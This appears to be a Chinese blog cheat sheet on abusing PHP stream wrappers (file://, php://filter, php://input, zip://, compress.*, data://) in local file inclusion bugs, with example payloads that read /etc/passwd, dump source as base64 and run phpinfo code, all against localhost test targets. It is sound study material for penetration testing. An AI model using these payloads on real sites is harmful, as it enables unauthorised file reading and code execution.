zoukankan      html  css  js  c++  java
  • 【汇总】PHP 伪协议 利用


    日期:2019-07-28 21:24:36
    更新:
    作者:Bay0net
    介绍:


    0x01、基本信息

    文件包含函数

    include()
    require()
    include_once()
    require_once()
    highlight_file ()
    show_source ()
    readfile()
    file_get_contents ()
    fopen()
    file()
    

    环境概要

    PHP 配置文件: php.ini
    默认路径: /etc/php5/apache2/php.ini

    具体要求:

    allow_url_fopen=on:默认开启,该选项为 on 便是激活了 URL 形式的 fopen 封装协议,使得可以访问 URL 对象文件等。
    
    allow_url_include=on:默认关闭,该选项为 on 便是允许包含 URL 对象文件等。
    

    0x02、伪协议

    file://协议

    该协议在双 off 的情况下也可以正常使用;

    ?page=file:///etc/passwd
    ?file=file://D:/soft/phpStudy/WWW/phpcode.txt
    

    php://协议

    不需要开启 allow_url_fopen
    下面的几个需要开启 allow_url_fopen

    php://input
    php://stdin
    php://memory
    php://temp
    

    php://filter 读文件

    环境:

    • allow_url_fopen :off/on
    • allow_url_include:off/on

    在双 off 的情况下也可以正常使用,用于读取源代码并进行 base64 编码输出,不然会直接当做 php 代码执行就看不到源代码内容了。

    ?page=php://filter/read=convert.base64-encode/resource=file1.php
    

    php://input 命令执行

    环境:

    • allow_url_fopen :off/on
    • allow_url_include:on

    注:当 enctype="multipart/form-data" 时,php://input 是无效的。

    payload:

    url:  http://127.0.0.1:81/vulnerabilities/fi/?page=php://input
    post: <?php phpinfo(); ?>
    

    zip:// 压缩文件

    环境:

    • allow_url_fopen :off/on
    • allow_url_include:off/on

    用法:

    • zip://archive.zip#dir/file.txt
    • zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

    实例

    http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt
    
    先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。
    
    由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
    

    bzip2://协议

    环境:

    • allow_url_fopen :off/on
    • allow_url_include:off/on

    用法:

    • compress.bzip2://file.bz2

    实例

    http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg
    
    http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg
    

    zlib://协议

    环境:

    • allow_url_fopen :off/on
    • allow_url_include:off/on

    用法:

    • compress.zlib://file.gz

    实例

    http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg
    
    http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg
    

    data://

    环境:

    • allow_url_fopen :on
    • allow_url_include:on

    实例

    # 明文
    http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>
    
    # base64 编码
    http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
    

    0x03、Reference

    php伪协议实现命令执行的七种姿势 - FreeBuf专栏·潜心学习的小白帽

    PHP: 支持的协议和封装协议 - Manual

  • 相关阅读:
    poj 3466 A Simple Problem with Integers
    java运行脚本语言demo
    Good Bye 2013---B. New Year Present
    游标-----内存中的一块区域,存放的是select 的结果
    Oracle 游标使用全解
    Oracle系列:记录Record
    10大协作办公工具:实现团队工作效率最大化
    如何有效使用Project(1)——编制进度计划、保存基准
    多项目同时进行如何做好进度管理
    @RISK
  • 原文地址:https://www.cnblogs.com/v1vvwv/p/PHP-wrappers.html
Copyright © 2011-2022 走看看